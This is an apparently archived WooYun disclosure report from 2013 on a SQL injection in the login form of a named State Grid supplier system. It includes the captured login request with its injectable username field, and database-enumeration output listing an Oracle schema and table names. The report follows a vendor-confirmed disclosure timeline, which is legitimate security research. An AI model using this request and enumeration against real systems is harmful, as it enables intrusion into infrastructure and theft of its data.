乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-09-03: 细节已通知厂商并且等待厂商处理中 2013-09-04: 厂商已经确认,细节仅向厂商公开 2013-09-14: 细节向核心白帽子及相关领域专家公开 2013-09-24: 细节向普通白帽子公开 2013-10-04: 细节向实习白帽子公开 2013-10-18: 细节向公众公开
这个系统要了命。
系统地址:
https://bosp.sgid.sgcc.com.cn/
虽然有SSL保护,但是还是抓了SSL的登陆包。
POST https://bosp.sgid.sgcc.com.cn/LoginAction.do HTTP/1.1Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Referer: https://bosp.sgid.sgcc.com.cn/LoginAction.doAccept-Language: zh-CNUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateHost: bosp.sgid.sgcc.com.cnContent-Length: 33Connection: Keep-AliveCache-Control: no-cacheCookie: JSESSIONID=MY7vSk1WHs8QVtbNv0LQTbzrsXrKNzGvzd9FJQBsJYqxmWv31SCm!326014796cn=&login_id=admin&password=admin
对用户名参数没有过滤,导致注入,好多好多数据。
web application technology: Servlet 2.4, JSP 2.0back-end DBMS: Oracleavailable databases [1]:[*] BOSP
604个表,我就不读取了,相视一笑。
[00:18:25] [INFO] retrieved: 604[00:18:33] [INFO] retrieved: BOSP_GLOBAL_SUPPLIER_0129[00:20:19] [INFO] retrieved: BOSP_GYS_SIGNATURE[00:21:16] [INFO] retrieved: BOSP_WF_USERSMSLINK[00:22:22] [INFO] retrieved: BOSP_GLOBAL_ATTACHMENT_BAK[00:23:54] [INFO] retrieved: BOSP_ZB_ACCDOCERRDETAIL[00:25:15] [INFO] retrieved: BOSP_ZB_ACCITEM[00:25:42] [INFO] retrieved: BOSP_ZB_ACCMODELENTRY[00:26:33] [INFO] retrieved: BOSP_ZB_APPROVEOPTION[00:27:32] [INFO] retrieved: BOSP_ZB_BORROWAPPLY[00:28:26] [INFO] retrieved: BOSP_ZB_BORROWYUSUAN[00:29:03] [INFO] retrieved: BOSP_ZB_BXDETAIL[00:29:42] [INFO] retrieved: BOSP_ZB_BXSTANDARD[00:30:25] [INFO] retrieved: BOSP_ZB_CHANGEBIDSERV
一部分数据来证明就行了。
见详细说明。
0x1:深夜挖洞的屌丝你伤的起?注入可能发生的地方都要严防死守。0x2:rank给力一点啊!!!
危害等级:高
漏洞Rank:15
确认时间:2013-09-04 08:44
谢谢
暂无